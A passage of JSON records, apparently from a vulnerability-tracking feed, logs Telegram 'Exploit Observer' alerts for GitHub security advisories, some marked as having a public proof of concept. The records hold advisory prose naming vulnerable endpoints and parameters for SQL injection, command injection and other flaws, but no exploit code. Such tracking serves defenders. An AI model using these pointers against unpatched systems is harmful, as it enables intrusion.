"published-proof-of-concept", "source": "https://t.me/arpsyndicate/3271", "content": "#ExploitObserverAlert\n\nGHSA-3rg4-qgv3-4987\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-3rg4-qgv3-4987. Microsoft Edge for Android Information Disclosure Vulnerability", "creation_timestamp": "2024-01-28T10:38:47.000000Z"}, {"uuid": "8aa82f77-1fd2-4ac0-baf2-38865ea36fda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V68G-WM8C-6X7J", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3236", "content": "#ExploitObserverAlert\n\nGHSA-v68g-wm8c-6x7j\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-v68g-wm8c-6x7j. Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36.", "creation_timestamp": "2024-01-28T06:41:51.000000Z"}, {"uuid": "822c5410-ff1b-43b2-995d-bd5dc01ceba1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PHRF-FJ83-FCFV", "type": "seen", "source": "https://t.me/arpsyndicate/3188", "content": "#ExploitObserverAlert\n\nGHSA-phrf-fj83-fcfv\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-phrf-fj83-fcfv. An issue was discovered in Cassia Access Controller 2.1.1.2303271039. The Web SSH terminal endpoint (spawned console) can be accessed without authentication. Specifically, there is no session cookie validation on the Access Controller; instead, there is only Basic Authentication to the SSH console.", "creation_timestamp": "2024-01-28T03:39:14.000000Z"}, {"uuid": "40620ca6-936e-464a-9256-a374ea1087ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6WR5-JMPR-MJCX", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3778", "content": "#ExploitObserverAlert\n\nGHSA-6wr5-jmpr-mjcx\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-6wr5-jmpr-mjcx. Uncaught Exception in Macro Expecting Native Function to Exist", "creation_timestamp": "2024-02-21T13:45:02.000000Z"}, {"uuid": "b8f397f6-0d29-4f7a-9b02-cff8baea8c59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3RV5-PGJ2-5FRG", "type": "seen", "source": "https://t.me/arpsyndicate/3293", "content": "#ExploitObserverAlert\n\nGHSA-3rv5-pgj2-5frg\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-3rv5-pgj2-5frg. A buffer overflow vulnerability exists in Symantec Deployment Solution version 7.9 when parsing UpdateComputer tokens. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM.", "creation_timestamp": "2024-01-28T13:05:09.000000Z"}, {"uuid": "868db351-6463-4bb7-a0d8-eb7597f2040d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3J9P-Q7W7-2GCF", "type": "seen", "source": "https://t.me/arpsyndicate/3291", "content": "#ExploitObserverAlert\n\nGHSA-3j9p-q7w7-2gcf\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-3j9p-q7w7-2gcf. A vulnerability was found in TRENDnet TEW-815DAP 1.0.2.0. It has been classified as critical. This affects the function do_setNTP of the component POST Request Handler. The manipulation of the argument NtpDstStart/NtpDstEnd leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252123. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", "creation_timestamp": "2024-01-28T12:56:25.000000Z"}, {"uuid": "81082523-3e1d-4022-bdc9-9fbcaa16c10f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8F6J-9HH3-9C9X", "type": "seen", "source": "https://t.me/arpsyndicate/3218", "content": "#ExploitObserverAlert\n\nGHSA-8f6j-9hh3-9c9x\n\nDESCRIPTION: Exploit Observer has 5 entries in 2 file formats related to GHSA-8f6j-9hh3-9c9x. In imap_scan_tree_recursive in Claws Mail through 3.17.6, a malicious IMAP server can trigger stack consumption because of unlimited recursion into subdirectories during a rebuild of the folder tree.", "creation_timestamp": "2024-01-28T05:32:16.000000Z"}, {"uuid": "1a0360db-7ab1-4842-95f2-f65d7ad6af5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8CWM-WR6Q-X76P", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3217", "content": "#ExploitObserverAlert\n\nGHSA-8cwm-wr6q-x76p\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-8cwm-wr6q-x76p. darkhttpd before 1.15 uses strcmp (which is not constant time) to verify authentication, which makes it easier for remote attackers to bypass authentication via a timing side channel.", "creation_timestamp": "2024-01-28T05:27:31.000000Z"}, {"uuid": "038987a3-7c56-44d8-b656-526f8af73ddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RMR5-CPV2-VGJF", "type": "seen", "source": "https://t.me/arpsyndicate/3229", "content": "#ExploitObserverAlert\n\nCVE-2021-43859\n\nDESCRIPTION: Exploit Observer has 11 entries in 5 file formats related to CVE-2021-43859. XStream is an open source java library to serialize objects to XML and back again. Versions prior to 1.4.19 may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. XStream 1.4.19 monitors and accumulates the time it takes to add elements to collections and throws an exception if a set threshold is exceeded. Users are advised to upgrade as soon as possible. Users unable to upgrade may set the NO_REFERENCE mode to prevent recursion. See GHSA-rmr5-cpv2-vgjf for further details on a workaround if an upgrade is not possible.\n\nFIRST-EPSS: 0.012320000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2024-01-28T06:16:41.000000Z"}, {"uuid": "62656458-5876-4b99-a799-8e16f41b162c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJF4-CG52-RF4G", "type": "seen", "source": "https://t.me/arpsyndicate/3253", "content": "#ExploitObserverAlert\n\nGHSA-xjf4-cg52-rf4g\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-xjf4-cg52-rf4g. Path traversal vulnerability in ACERA 1320 firmware ver.01.26 and earlier, and ACERA 1310 firmware ver.01.26 and earlier allows a network-adjacent authenticated attacker to alter critical information such as system files by sending a specially crafted request. They are affected when running in ST(Standalone) mode.", "creation_timestamp": "2024-01-28T07:38:40.000000Z"}, {"uuid": "d28acffa-37ad-4a74-8c4d-ffe162b23ba0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RGJQ-F6GR-756J", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3250", "content": "#ExploitObserverAlert\n\nGHSA-rgjq-f6gr-756j\n\nDESCRIPTION: Exploit Observer has 4 entries in 3 file formats related to GHSA-rgjq-f6gr-756j. libyang from v2.0.164 to v2.1.30 was discovered to contain a NULL pointer dereference via the function lys_parse_mem at lys_parse_mem.c.", "creation_timestamp": "2024-01-28T07:21:56.000000Z"}, {"uuid": "748947d5-457f-445f-9fd2-55e01c1f0844", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GWR4-PJ6R-2576", "type": "seen", "source": "https://t.me/arpsyndicate/3120", "content": "#ExploitObserverAlert\n\nGHSA-gwr4-pj6r-2576\n\nDESCRIPTION: Exploit Observer has 7 entries in 5 file formats related to GHSA-gwr4-pj6r-2576. ** UNSUPPORTED WHEN ASSIGNED ** Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.", "creation_timestamp": "2024-01-26T23:52:03.000000Z"}, {"uuid": "4f82606f-cb17-4c2b-810e-dbf4a38e488e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4425-3V92-M6Q6", "type": "seen", "source": "https://t.me/arpsyndicate/3119", "content": "#ExploitObserverAlert\n\nGHSA-4425-3v92-m6q6\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-4425-3v92-m6q6. Improper Input Validation in Hitron Systems DVR LGUVR-8H 1.02~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW.", "creation_timestamp": "2024-01-26T23:50:15.000000Z"}, {"uuid": "a8d075a1-f1df-4abb-bee6-90e0d4344c82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8CR8-4VFW-MR7H", "type": "seen", "source": "https://t.me/arpsyndicate/3242", "content": "#ExploitObserverAlert\n\nGHSA-8cr8-4vfw-mr7h\n\nDESCRIPTION: Exploit Observer has 11 entries in 3 file formats related to GHSA-8cr8-4vfw-mr7h. The REXML gem before 3.2.5 in Ruby before 2.6.7, 2.7.x before 2.7.3, and 3.x before 3.0.1 does not properly address XML round-trip issues. An incorrect document can be produced after parsing and serializing.", "creation_timestamp": "2024-01-28T07:02:33.000000Z"}, {"uuid": "46984e48-002f-4b47-98c0-de1f29326160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWF9-8FQR-P44M", "type": "seen", "source": "https://t.me/arpsyndicate/3150", "content": "#ExploitObserverAlert\n\nGHSA-rwf9-8fqr-p44m\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-rwf9-8fqr-p44m. Qualys Jenkins Plugin for Policy Compliance prior to version and including 1.0.5 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access and access to configure or edit jobs to utilize the plugin to configure a potential rouge endpoint via which\u00a0it was possible to control response for certain request which could be injected with XSS payloads leading to XSS\u00a0while processing the response data.", "creation_timestamp": "2024-01-28T01:29:27.000000Z"}, {"uuid": "ddc4f761-8ea8-4775-8880-785730332251", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J2P7-J8V8-Q5G2", "type": "seen", "source": "https://t.me/arpsyndicate/3069", "content": "#ExploitObserverAlert\n\nGHSA-j2p7-j8v8-q5g2\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-j2p7-j8v8-q5g2. Orthanc versions before 1.12.2 are affected by a reflected cross-site scripting (XSS) vulnerability. The vulnerability was present in the server's error reporting.", "creation_timestamp": "2024-01-26T20:57:43.000000Z"}, {"uuid": "9413536b-c2a5-4cb1-b717-feb0da2e3e3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRQG-MWH7-Q94J", "type": "seen", "source": "https://t.me/arpsyndicate/3067", "content": "#ExploitObserverAlert\n\nGHSA-mrqg-mwh7-q94j\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-mrqg-mwh7-q94j. The password reset functionality sends to the the user requesting a password change an email containing an URL to reset its password.", "creation_timestamp": "2024-01-26T20:51:28.000000Z"}, {"uuid": "8425f1f3-1446-4f13-b7f2-bbb09c3cc3b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R64R-5H43-26QV", "type": "seen", "source": "https://t.me/arpsyndicate/3064", "content": "#ExploitObserverAlert\n\nGHSA-r64r-5h43-26qv\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-r64r-5h43-26qv. Users can report private messages, even when they're neither sender nor recipient of the message. The API response to creating a private message report contains the private message itself, which means any user can just iterate over message ids to (loudly) obtain all private messages of an instance. A user with instance admin privileges can also abuse this if the private message is removed from the response, as they're able to see the resulting reports.", "creation_timestamp": "2024-01-26T20:37:12.000000Z"}, {"uuid": "fbf81eb8-8820-4d19-8659-3357b5bac117", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HRGC-CR5F-PW7V", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3227", "content": "#ExploitObserverAlert\n\nGHSA-hrgc-cr5f-pw7v\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-hrgc-cr5f-pw7v. Microsoft Edge for Android Spoofing Vulnerability", "creation_timestamp": "2024-01-28T06:08:09.000000Z"}, {"uuid": "9d05130c-1979-424c-bbfb-d6ebf14394d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8J28-CCXG-GG78", "type": "seen", "source": "https://t.me/arpsyndicate/3215", "content": "#ExploitObserverAlert\n\nGHSA-8j28-ccxg-gg78\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-8j28-ccxg-gg78. A vulnerability has been found in DedeBIZ 6.3.0 and classified as critical. This vulnerability affects unknown code of the file /admin/makehtml_freelist_action.php. The manipulation of the argument startid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250726 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", "creation_timestamp": "2024-01-28T05:19:22.000000Z"}, {"uuid": "e30d719f-e1f1-43d1-bc20-e3746f538cd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JPR7-Q523-HX25", "type": "seen", "source": "https://t.me/arpsyndicate/3214", "content": "#ExploitObserverAlert\n\nGHSA-jpr7-q523-hx25\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-jpr7-q523-hx25. In Math/BinaryField.php in phpseclib 3 before 3.0.34, excessively large degrees in binary fields can lead to a denial of service.", "creation_timestamp": "2024-01-28T05:15:14.000000Z"}, {"uuid": "ee37b930-cb73-4bdc-9706-157196131667", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5F8-8PPP-6WXQ", "type": "seen", "source": "https://t.me/arpsyndicate/3209", "content": "#ExploitObserverAlert\n\nGHSA-h5f8-8ppp-6wxq\n\nDESCRIPTION: Exploit Observer has 6 entries in 2 file formats related to GHSA-h5f8-8ppp-6wxq. Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)", "creation_timestamp": "2024-01-28T04:53:32.000000Z"}, {"uuid": "e98cf2a8-030a-4dd0-8e83-d17b5a4dcd2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VWV2-9WCJ-64VX", "type": "seen", "source": "https://t.me/arpsyndicate/2955", "content": "#ExploitObserverAlert\n\nGHSA-vwv2-9wcj-64vx\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-VWV2-9WCJ-64VX. Firefly III (aka firefly-iii) before 6.1.1 allows webhooks HTML Injection.\n\nGHSS: 6.5", "creation_timestamp": "2024-01-19T19:57:02.000000Z"}, {"uuid": "ce45472f-78b9-47e6-9c20-e0a6630b5522", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ6F-MR2F-7C6M", "type": "seen", "source": "https://t.me/arpsyndicate/3186", "content": "#ExploitObserverAlert\n\nGHSA-xj6f-mr2f-7c6m\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-xj6f-mr2f-7c6m. Information Disclosure in Data Modem while performing a VoLTE call with an undefined RTCP FB line value.", "creation_timestamp": "2024-01-28T03:35:03.000000Z"}, {"uuid": "354c0e5a-a9b8-4052-8217-36eb4010c211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GXG7-PXWF-9R28", "type": "seen", "source": "https://t.me/arpsyndicate/3347", "content": "#ExploitObserverAlert\n\nGHSA-gxg7-pxwf-9r28\n\nDESCRIPTION: Exploit Observer has 7 entries in 2 file formats related to GHSA-gxg7-pxwf-9r28. An improper input validation flaw was found in the eBPF subsystem in the Linux kernel. The issue occurs due to a lack of proper validation of dynamic pointers within user-supplied eBPF programs prior to executing them. This may allow an attacker with CAP_BPF privileges to escalate privileges and execute arbitrary code in the context of the kernel.", "creation_timestamp": "2024-01-29T10:32:26.000000Z"}, {"uuid": "2f5e7796-42ae-4e01-bfc0-af34771e965a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HR8F-72R6-VQ27", "type": "seen", "source": "https://t.me/arpsyndicate/3329", "content": "#ExploitObserverAlert\n\nGHSA-hr8f-72r6-vq27\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-hr8f-72r6-vq27. Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute an arbitrary script on the logged-in user's web browser.", "creation_timestamp": "2024-01-29T09:52:22.000000Z"}, {"uuid": "0c9a951f-4bb3-4615-bdf3-018c78c06a8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VRX4-754W-FHFX", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3054", "content": "#ExploitObserverAlert\n\nGHSA-vrx4-754w-fhfx\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-VRX4-754W-FHFX. TOTOLINK_A3700R_V9.1.2u.6165_20211012has a stack overflow vulnerability via setLanguageCfg", "creation_timestamp": "2024-01-26T20:13:02.000000Z"}, {"uuid": "cbbfe185-e735-4d92-8437-e55fd48bf4f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X4J2-FH47-R6R6", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3346", "content": "#ExploitObserverAlert\n\nGHSA-x4j2-fh47-r6r6\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-x4j2-fh47-r6r6. Alinto SOGo 5.8.0 is vulnerable to HTML Injection.", "creation_timestamp": "2024-01-29T10:30:43.000000Z"}, {"uuid": "66fe8736-1591-4c82-966a-876a7e3dbe03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ93-576J-8Q58", "type": "seen", "source": "https://t.me/arpsyndicate/3315", "content": "#ExploitObserverAlert\n\nGHSA-wq93-576j-8q58\n\nDESCRIPTION: Exploit Observer has 9 entries in 2 file formats related to GHSA-wq93-576j-8q58. A privacy issue was addressed with improved handling of files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access sensitive user data.", "creation_timestamp": "2024-01-29T09:20:15.000000Z"}, {"uuid": "98d78155-208d-493a-b7af-0b17677706b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6WRQ-J9QQ-5V7V", "type": "seen", "source": "https://t.me/arpsyndicate/3246", "content": "#ExploitObserverAlert\n\nGHSA-6wrq-j9qq-5v7v\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-6wrq-j9qq-5v7v. The \"WebSub (FKA. PubSubHubbub)\" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", "creation_timestamp": "2024-01-28T07:13:35.000000Z"}, {"uuid": "33a6e0c2-e435-4b2f-a859-0e1b1e98db44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5G66-628F-7CVJ", "type": "seen", "source": "https://t.me/arpsyndicate/2505", "content": "#ExploitObserverAlert\n\nGHSA-5g66-628f-7cvj\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-5G66-628F-7CVJ. The implementation did not validate the legitimacy of the email attribute of the user nor did it give/document an option to do so, making it susceptible to nOAuth misconfiguration in cases when the email is used as a trusted user identifier\n\nGHSS: 8.6", "creation_timestamp": "2024-01-05T18:13:28.000000Z"}, {"uuid": "464067d8-82c6-4784-9d79-5bfbd8b35494", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27WG-99G8-2V4V", "type": "seen", "source": "https://t.me/arpsyndicate/2504", "content": "#ExploitObserverAlert\n\nGHSA-27wg-99g8-2v4v\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-27WG-99G8-2V4V. In rust-evm, a feature called record_external_operation was introduced, allowing library users to record custom gas changes. This feature can have some bogus interactions with the call stack.\n\nGHSS: 5.9", "creation_timestamp": "2024-01-05T18:05:09.000000Z"}, {"uuid": "ca891a97-0f97-4d1a-879d-8e98e9ba4254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR6X-48QQ-2PX8", "type": "seen", "source": "https://t.me/arpsyndicate/2243", "content": "#ExploitObserverAlert\n\nGHSA-fr6x-48qq-2px8\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-FR6X-48QQ-2PX8. A vulnerability was found in FabulaTech Webcam for Remote Desktop 2.8.42 and classified as problematic. This issue affects some unknown processing in the library ftwebcam.sys of the component Global Variable Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222359.\n\nGHSS: 5.5", "creation_timestamp": "2023-12-29T11:40:21.000000Z"}, {"uuid": "b8b7dbc7-1cbe-4367-9a1d-daa4767e19c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FPQG-FV5V-VHPR", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3125", "content": "#ExploitObserverAlert\n\nGHSA-fpqg-fv5v-vhpr\n\nDESCRIPTION: Exploit Observer has 4 entries in 3 file formats related to GHSA-fpqg-fv5v-vhpr. An issue in Plone Docker Official Image 5.2.13 (5221) open-source software allows for remote code execution via improper validation of input by the HOST headers.", "creation_timestamp": "2024-01-28T00:07:13.000000Z"}, {"uuid": "944be072-9ac6-457d-ad4a-23d12312a0c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R2MG-QW96-W89Q", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3106", "content": "#ExploitObserverAlert\n\nGHSA-r2mg-qw96-w89q\n\nDESCRIPTION: Exploit Observer has 6 entries in 2 file formats related to GHSA-r2mg-qw96-w89q. The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges.", "creation_timestamp": "2024-01-26T23:04:47.000000Z"}, {"uuid": "859fc913-254e-45a6-af71-9804ac51f1da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3M6-GVM8-MHVW", "type": "seen", "source": "https://t.me/arpsyndicate/3084", "content": "#ExploitObserverAlert\n\nGHSA-j3m6-gvm8-mhvw\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-j3m6-gvm8-mhvw. Users who don't have edit or delete permissions for records exposed in a ModelAdmin can still edit or delete records using the CSV import form, provided they have create permissions.", "creation_timestamp": "2024-01-26T21:51:46.000000Z"}, {"uuid": "d871b2c5-dbe1-47f5-ad7e-78873a8f4d33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G5M6-HXPP-FC49", "type": "seen", "source": "https://t.me/arpsyndicate/3093", "content": "#ExploitObserverAlert\n\nGHSA-g5m6-hxpp-fc49\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-g5m6-hxpp-fc49. In SvelteKit 2 sending a GET request with a body eg {} to a SvelteKit app in preview or with adapter-node throws Request with GET/HEAD method cannot have body. and crashes the app.", "creation_timestamp": "2024-01-26T22:14:38.000000Z"}, {"uuid": "b0aea994-d74f-498d-9506-b92e6c2f7af1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CJGM-9VC9-56MX", "type": "seen", "source": "https://t.me/arpsyndicate/3076", "content": "#ExploitObserverAlert\n\nGHSA-cjgm-9vc9-56mx\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-cjgm-9vc9-56mx. Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects, allowing attackers with Item/Configure permission to create or replace any config.xml files on the Jenkins controller file system with content not controllable by the attackers.", "creation_timestamp": "2024-01-26T21:20:27.000000Z"}, {"uuid": "fc2c2b5b-c41f-4ef4-8d4b-24da8fe8ba3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CWX6-4WMF-C6XV", "type": "seen", "source": "https://t.me/arpsyndicate/2991", "content": "#ExploitObserverAlert\n\nGHSA-cwx6-4wmf-c6xv\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-CWX6-4WMF-C6XV. The application allows to create zip files from available files on the site. The parameter \"selectedIds\", is susceptible to SQL Injection.", "creation_timestamp": "2024-01-26T15:49:11.000000Z"}, {"uuid": "b0891d45-70ec-4738-b510-d5435717ee48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R6R4-5PR8-GJCP", "type": "seen", "source": "https://t.me/arpsyndicate/2500", "content": "#ExploitObserverAlert\n\nGHSA-r6r4-5pr8-gjcp\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-R6R4-5PR8-GJCP. Vapor's vapor_urlparser_parse function uses uint16_t indexes when parsing a URI's components, which may cause integer overflows when parsing untrusted inputs.\n\nGHSS: 6.5", "creation_timestamp": "2024-01-05T17:14:16.000000Z"}, {"uuid": "2dcd6573-e1a8-42a3-baab-deb4243e4128", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F8MP-X433-5WPF", "type": "seen", "source": "https://t.me/arpsyndicate/2498", "content": "#ExploitObserverAlert\n\nGHSA-f8mp-x433-5wpf\n\nDESCRIPTION: Exploit Observer has 5 entries related to GHSA-F8MP-X433-5WPF. The V8 inspector intentionally allows arbitrary code execution within the Workers sandbox for debugging. wrangler dev would previously start an inspector server listening on all network interfaces. This would allow an attacker on the local network to connect to the inspector and run arbitrary code. Additionally, the inspector server did not validate Origin/Host headers, granting an attacker that can trick any user on the local network into opening a malicious 